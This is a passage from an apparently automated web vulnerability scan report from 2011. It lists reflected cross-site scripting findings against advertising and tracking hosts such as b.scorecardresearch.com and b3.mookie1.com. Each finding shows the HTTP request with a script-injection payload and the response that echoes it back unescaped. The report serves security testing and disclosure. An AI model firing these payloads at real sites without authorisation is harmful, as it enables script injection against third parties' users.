if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
score;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();
COMSCORE.beacon({c1:"3", c2:"6035338", c3:".uy!", c4:".id!", c5:"57892644d5698<script>alert(1)</script>41ad9abe9a7", c6:"", c10:"", c15:"", c16:"", r:""});

1.94. http://b.scorecardresearch.com/beacon.js [c6 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c6 request parameter is copied into the HTML document as plain text between tags. The payload cd70e<script>alert(1)</script>b6f76d922d1 was submitted in the c6 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=3&c2=6035338&c3=%EBuy!&c4=%ECid!&c5=57892644&c6=cd70e<script>alert(1)</script>b6f76d922d1& HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://drudgereport.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=1f00d615-24.143.206.88-1294170954

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Mon, 21 Feb 2011 01:26:38 GMT
Date: Mon, 14 Feb 2011 01:26:38 GMT
Connection: close
Content-Length: 3596

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
or(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();
COMSCORE.beacon({c1:"3", c2:"6035338", c3:".uy!", c4:".id!", c5:"57892644", c6:"cd70e<script>alert(1)</script>b6f76d922d1", c10:"", c15:"", c16:"", r:""});

1.95. http://b3.mookie1.com/2/RocketFuelB3/FarmersBranding/2011Q1/BTRT1/728/11297647300104@x90 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/RocketFuelB3/FarmersBranding/2011Q1/BTRT1/728/11297647300104@x90

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 37cdc"><script>alert(1)</script>42f29418bd4 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/RocketFuelB337cdc"><script>alert(1)</script>42f29418bd4/FarmersBranding/2011Q1/BTRT1/728/11297647300104@x90 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://a.rfihub.com/sed?w=728&h=90&re=19969&pv=0&ra=6473367370.8131766689475626&rb=445&ca=&rc=10.2&rd=&ua=&ub=&uc=&ud=&ue=&pa=ppre647336735316&pb=&pc=&pd=&pg=&ct=1297647336737&pe=http%3A%2F%2Fwww.washingtonpost.com%2Fwp-dyn%2Fcontent%2Farticle%2F2011%2F02%2F13%2FAR2011021301463.html&pf=http%3A%2F%2Fwww.washingtonpost.com%2Fwp-dyn%2Fcontent%2Farticle%2F2011%2F02%2F13%2FAR2011021301463.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; Dominos=DataXuB3; RMFL=011Pi745U102Og|U106t6; ATTWL=CollectiveB3; other_20110126=set; dlx_XXX=set; NXCLICK2=011Pnu1BNX_TRACK_Radioshack/Exelate/DYN2011Q1/X_I_SOH/1x1/11297434639.7437!y!B3!CXJ!EVR; RMFM=011PoJwiD102PB|B106w2|R106y5|D10C7a|D10CEj|T10CXJ|U10Dil; FarmersBranding=RocketFuelB3; id=914803576615380

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:36:07 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 364
Content-Type: text/html
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09499e3545525d5f4f58455e445a4a423660;path=/

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/RocketFuelB337cdc"><script>alert(1)</script>42f29418bd4/FarmersBranding/2011Q1/BTRT1/728/115666934/x90/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top">
...[SNIP]...

1.96. http://b3.mookie1.com/2/RocketFuelB3/FarmersBranding/2011Q1/BTRT1/728/11297647300104@x90 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/RocketFuelB3/FarmersBranding/2011Q1/BTRT1/728/11297647300104@x90

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e176c"><script>alert(1)</script>ba946806cc4 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/RocketFuelB3/FarmersBrandinge176c"><script>alert(1)</script>ba946806cc4/2011Q1/BTRT1/728/11297647300104@x90 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://a.rfihub.com/sed?w=728&h=90&re=19969&pv=0&ra=6473367370.8131766689475626&rb=445&ca=&rc=10.2&rd=&ua=&ub=&uc=&ud=&ue=&pa=ppre647336735316&pb=&pc=&pd=&pg=&ct=1297647336737&pe=http%3A%2F%2Fwww.washingtonpost.com%2Fwp-dyn%2Fcontent%2Farticle%2F2011%2F02%2F13%2FAR2011021301463.html&pf=http%3A%2F%2Fwww.washingtonpost.com%2Fwp-dyn%2Fcontent%2Farticle%2F2011%2F02%2F13%2FAR2011021301463.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; Dominos=DataXuB3; RMFL=011Pi745U102Og|U106t6; ATTWL=CollectiveB3; other_20110126=set; dlx_XXX=set; NXCLICK2=011Pnu1BNX_TRACK_Radioshack/Exelate/DYN2011Q1/X_I_SOH/1x1/11297434639.7437!y!B3!CXJ!EVR; RMFM=011PoJwiD102PB|B106w2|R106y5|D10C7a|D10CEj|T10CXJ|U10Dil; FarmersBranding=RocketFuelB3; id=914803576615380

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:36:10 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 364
Content-Type: text/html
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09499e2645525d5f4f58455e445a4a423660;path=/

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/RocketFuelB3/FarmersBrandinge176c"><script>alert(1)</script>ba946806cc4/2011Q1/BTRT1/728/440039318/x90/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top">
...[SNIP]...

1.97. http://b3.mookie1.com/2/RocketFuelB3/FarmersBranding/2011Q1/BTRT1/728/11297647300104@x90 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/RocketFuelB3/FarmersBranding/2011Q1/BTRT1/728/11297647300104@x90

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 12411"><script>alert(1)</script>948b5d9dd28 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/RocketFuelB3/FarmersBranding/2011Q112411"><script>alert(1)</script>948b5d9dd28/BTRT1/728/11297647300104@x90 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://a.rfihub.com/sed?w=728&h=90&re=19969&pv=0&ra=6473367370.8131766689475626&rb=445&ca=&rc=10.2&rd=&ua=&ub=&uc=&ud=&ue=&pa=ppre647336735316&pb=&pc=&pd=&pg=&ct=1297647336737&pe=http%3A%2F%2Fwww.washingtonpost.com%2Fwp-dyn%2Fcontent%2Farticle%2F2011%2F02%2F13%2FAR2011021301463.html&pf=http%3A%2F%2Fwww.washingtonpost.com%2Fwp-dyn%2Fcontent%2Farticle%2F2011%2F02%2F13%2FAR2011021301463.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; Dominos=DataXuB3; RMFL=011Pi745U102Og|U106t6; ATTWL=CollectiveB3; other_20110126=set; dlx_XXX=set; NXCLICK2=011Pnu1BNX_TRACK_Radioshack/Exelate/DYN2011Q1/X_I_SOH/1x1/11297434639.7437!y!B3!CXJ!EVR; RMFM=011PoJwiD102PB|B106w2|R106y5|D10C7a|D10CEj|T10CXJ|U10Dil; FarmersBranding=RocketFuelB3; id=914803576615380

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:36:19 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 365
Content-Type: text/html
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09499e3545525d5f4f58455e445a4a423660;path=/

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/RocketFuelB3/FarmersBranding/2011Q112411"><script>alert(1)</script>948b5d9dd28/BTRT1/728/1632556584/x90/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top">
...[SNIP]...

1.98. http://b3.mookie1.com/2/RocketFuelB3/FarmersBranding/2011Q1/BTRT1/728/11297647300104@x90 [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/RocketFuelB3/FarmersBranding/2011Q1/BTRT1/728/11297647300104@x90

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b804e"><script>alert(1)</script>4cb874026ca was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/RocketFuelB3/FarmersBranding/2011Q1/BTRT1b804e"><script>alert(1)</script>4cb874026ca/728/11297647300104@x90 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://a.rfihub.com/sed?w=728&h=90&re=19969&pv=0&ra=6473367370.8131766689475626&rb=445&ca=&rc=10.2&rd=&ua=&ub=&uc=&ud=&ue=&pa=ppre647336735316&pb=&pc=&pd=&pg=&ct=1297647336737&pe=http%3A%2F%2Fwww.washingtonpost.com%2Fwp-dyn%2Fcontent%2Farticle%2F2011%2F02%2F13%2FAR2011021301463.html&pf=http%3A%2F%2Fwww.washingtonpost.com%2Fwp-dyn%2Fcontent%2Farticle%2F2011%2F02%2F13%2FAR2011021301463.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; Dominos=DataXuB3; RMFL=011Pi745U102Og|U106t6; ATTWL=CollectiveB3; other_20110126=set; dlx_XXX=set; NXCLICK2=011Pnu1BNX_TRACK_Radioshack/Exelate/DYN2011Q1/X_I_SOH/1x1/11297434639.7437!y!B3!CXJ!EVR; RMFM=011PoJwiD102PB|B106w2|R106y5|D10C7a|D10CEj|T10CXJ|U10Dil; FarmersBranding=RocketFuelB3; id=914803576615380

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:36:22 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 364
Content-Type: text/html
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09499e3445525d5f4f58455e445a4a423660;path=/

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/RocketFuelB3/FarmersBranding/2011Q1/BTRT1b804e"><script>alert(1)</script>4cb874026ca/728/844783005/x90/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top">
...[SNIP]...

1.99. http://b3.mookie1.com/2/RocketFuelB3/FarmersBranding/2011Q1/BTRT1/728/11297647300104@x90 [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/RocketFuelB3/FarmersBranding/2011Q1/BTRT1/728/11297647300104@x90

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 168c3"><script>alert(1)</script>e6ff1b42792 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/RocketFuelB3/FarmersBranding/2011Q1/BTRT1/728168c3"><script>alert(1)</script>e6ff1b42792/11297647300104@x90 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://a.rfihub.com/sed?w=728&h=90&re=19969&pv=0&ra=6473367370.8131766689475626&rb=445&ca=&rc=10.2&rd=&ua=&ub=&uc=&ud=&ue=&pa=ppre647336735316&pb=&pc=&pd=&pg=&ct=1297647336737&pe=http%3A%2F%2Fwww.washingtonpost.com%2Fwp-dyn%2Fcontent%2Farticle%2F2011%2F02%2F13%2FAR2011021301463.html&pf=http%3A%2F%2Fwww.washingtonpost.com%2Fwp-dyn%2Fcontent%2Farticle%2F2011%2F02%2F13%2FAR2011021301463.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; Dominos=DataXuB3; RMFL=011Pi745U102Og|U106t6; ATTWL=CollectiveB3; other_20110126=set; dlx_XXX=set; NXCLICK2=011Pnu1BNX_TRACK_Radioshack/Exelate/DYN2011Q1/X_I_SOH/1x1/11297434639.7437!y!B3!CXJ!EVR; RMFM=011PoJwiD102PB|B106w2|R106y5|D10C7a|D10CEj|T10CXJ|U10Dil; FarmersBranding=RocketFuelB3; id=914803576615380

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:36:24 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 364
Content-Type: text/html
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09499e2145525d5f4f58455e445a4a423660;path=/

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/RocketFuelB3/FarmersBranding/2011Q1/BTRT1/728168c3"><script>alert(1)</script>e6ff1b42792/303112085/x90/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top">
...[SNIP]...

1.100. http://b3.mookie1.com/2/RocketFuelB3/FarmersBranding/2011Q1/BTRT1/728/11297647300104@x90 [REST URL parameter 7]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/RocketFuelB3/FarmersBranding/2011Q1/BTRT1/728/11297647300104@x90

Issue detail

The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4f787"><script>alert(1)</script>32af85f766d was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/RocketFuelB3/FarmersBranding/2011Q1/BTRT1/728/11297647300104@x904f787"><script>alert(1)</script>32af85f766d HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://a.rfihub.com/sed?w=728&h=90&re=19969&pv=0&ra=6473367370.8131766689475626&rb=445&ca=&rc=10.2&rd=&ua=&ub=&uc=&ud=&ue=&pa=ppre647336735316&pb=&pc=&pd=&pg=&ct=1297647336737&pe=http%3A%2F%2Fwww.washingtonpost.com%2Fwp-dyn%2Fcontent%2Farticle%2F2011%2F02%2F13%2FAR2011021301463.html&pf=http%3A%2F%2Fwww.washingtonpost.com%2Fwp-dyn%2Fcontent%2Farticle%2F2011%2F02%2F13%2FAR2011021301463.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; Dominos=DataXuB3; RMFL=011Pi745U102Og|U106t6; ATTWL=CollectiveB3; other_20110126=set; dlx_XXX=set; NXCLICK2=011Pnu1BNX_TRACK_Radioshack/Exelate/DYN2011Q1/X_I_SOH/1x1/11297434639.7437!y!B3!CXJ!EVR; RMFM=011PoJwiD102PB|B106w2|R106y5|D10C7a|D10CEj|T10CXJ|U10Dil; FarmersBranding=RocketFuelB3; id=914803576615380

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:36:26 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 357
Content-Type: text/html
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09499e2645525d5f4f58455e445a4a423660;path=/

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/RocketFuelB3/FarmersBranding/2011Q1/BTRT1/728/2008971942/x904f787"><script>alert(1)</script>32af85f766d/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top">
...[SNIP]...

1.101. http://b3.mookie1.com/2/TrafficMarketplaceB3/ATTW/1H_11Q1/RON1HCPC/300/1499044944143599616@x90 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/TrafficMarketplaceB3/ATTW/1H_11Q1/RON1HCPC/300/1499044944143599616@x90

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 53250"><script>alert(1)</script>f2c52472042 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/TrafficMarketplaceB353250"><script>alert(1)</script>f2c52472042/ATTW/1H_11Q1/RON1HCPC/300/1499044944143599616@x90 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://media.adfrontiers.com/pq?t=f&s=530&ts=1297650508738&cm=191&ac=5&at=2&xvk=94178592.26350212&fd=t&tc=1&rr=t
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; Dominos=DataXuB3; RMFL=011Pi745U102Og|U106t6; ATTWL=CollectiveB3; other_20110126=set; dlx_XXX=set; NXCLICK2=011Pnu1BNX_TRACK_Radioshack/Exelate/DYN2011Q1/X_I_SOH/1x1/11297434639.7437!y!B3!CXJ!EVR; RMFM=011PoJwiD102PB|B106w2|R106y5|D10C7a|D10CEj|T10CXJ|U10Dil; NSC_o4efm_qppm_iuuq=ffffffff09499e2045525d5f4f58455e445a4a423660; FarmersBranding=RocketFuelB3; id=914803576615380; session=1297647384|1297647384

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 02:29:16 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 365
Content-Type: text/html

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/TrafficMarketplaceB353250"><script>alert(1)</script>f2c52472042/ATTW/1H_11Q1/RON1HCPC/300/782092599/x90/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top">
...[SNIP]...

1.102. http://b3.mookie1.com/2/TrafficMarketplaceB3/ATTW/1H_11Q1/RON1HCPC/300/1499044944143599616@x90 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/TrafficMarketplaceB3/ATTW/1H_11Q1/RON1HCPC/300/1499044944143599616@x90

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 106f9"><script>alert(1)</script>f534803ea84 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/TrafficMarketplaceB3/ATTW106f9"><script>alert(1)</script>f534803ea84/1H_11Q1/RON1HCPC/300/1499044944143599616@x90 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://media.adfrontiers.com/pq?t=f&s=530&ts=1297650508738&cm=191&ac=5&at=2&xvk=94178592.26350212&fd=t&tc=1&rr=t
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; Dominos=DataXuB3; RMFL=011Pi745U102Og|U106t6; ATTWL=CollectiveB3; other_20110126=set; dlx_XXX=set; NXCLICK2=011Pnu1BNX_TRACK_Radioshack/Exelate/DYN2011Q1/X_I_SOH/1x1/11297434639.7437!y!B3!CXJ!EVR; RMFM=011PoJwiD102PB|B106w2|R106y5|D10C7a|D10CEj|T10CXJ|U10Dil; NSC_o4efm_qppm_iuuq=ffffffff09499e2045525d5f4f58455e445a4a423660; FarmersBranding=RocketFuelB3; id=914803576615380; session=1297647384|1297647384

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 02:29:18 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 365
Content-Type: text/html

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/TrafficMarketplaceB3/ATTW106f9"><script>alert(1)</script>f534803ea84/1H_11Q1/RON1HCPC/300/381312021/x90/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top">
...[SNIP]...

1.103. http://b3.mookie1.com/2/TrafficMarketplaceB3/ATTW/1H_11Q1/RON1HCPC/300/1499044944143599616@x90 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/TrafficMarketplaceB3/ATTW/1H_11Q1/RON1HCPC/300/1499044944143599616@x90

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e043d"><script>alert(1)</script>d97c917261a was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/TrafficMarketplaceB3/ATTW/1H_11Q1e043d"><script>alert(1)</script>d97c917261a/RON1HCPC/300/1499044944143599616@x90 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://media.adfrontiers.com/pq?t=f&s=530&ts=1297650508738&cm=191&ac=5&at=2&xvk=94178592.26350212&fd=t&tc=1&rr=t
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; Dominos=DataXuB3; RMFL=011Pi745U102Og|U106t6; ATTWL=CollectiveB3; other_20110126=set; dlx_XXX=set; NXCLICK2=011Pnu1BNX_TRACK_Radioshack/Exelate/DYN2011Q1/X_I_SOH/1x1/11297434639.7437!y!B3!CXJ!EVR; RMFM=011PoJwiD102PB|B106w2|R106y5|D10C7a|D10CEj|T10CXJ|U10Dil; NSC_o4efm_qppm_iuuq=ffffffff09499e2045525d5f4f58455e445a4a423660; FarmersBranding=RocketFuelB3; id=914803576615380; session=1297647384|1297647384

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 02:29:20 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 366
Content-Type: text/html

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/TrafficMarketplaceB3/ATTW/1H_11Q1e043d"><script>alert(1)</script>d97c917261a/RON1HCPC/300/1322201168/x90/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top">
...[SNIP]...

1.104. http://b3.mookie1.com/2/TrafficMarketplaceB3/ATTW/1H_11Q1/RON1HCPC/300/1499044944143599616@x90 [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/TrafficMarketplaceB3/ATTW/1H_11Q1/RON1HCPC/300/1499044944143599616@x90

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 340af"><script>alert(1)</script>fde4b5f29d6 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/TrafficMarketplaceB3/ATTW/1H_11Q1/RON1HCPC340af"><script>alert(1)</script>fde4b5f29d6/300/1499044944143599616@x90 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://media.adfrontiers.com/pq?t=f&s=530&ts=1297650508738&cm=191&ac=5&at=2&xvk=94178592.26350212&fd=t&tc=1&rr=t
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; Dominos=DataXuB3; RMFL=011Pi745U102Og|U106t6; ATTWL=CollectiveB3; other_20110126=set; dlx_XXX=set; NXCLICK2=011Pnu1BNX_TRACK_Radioshack/Exelate/DYN2011Q1/X_I_SOH/1x1/11297434639.7437!y!B3!CXJ!EVR; RMFM=011PoJwiD102PB|B106w2|R106y5|D10C7a|D10CEj|T10CXJ|U10Dil; NSC_o4efm_qppm_iuuq=ffffffff09499e2045525d5f4f58455e445a4a423660; FarmersBranding=RocketFuelB3; id=914803576615380; session=1297647384|1297647384

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 02:29:24 GMT
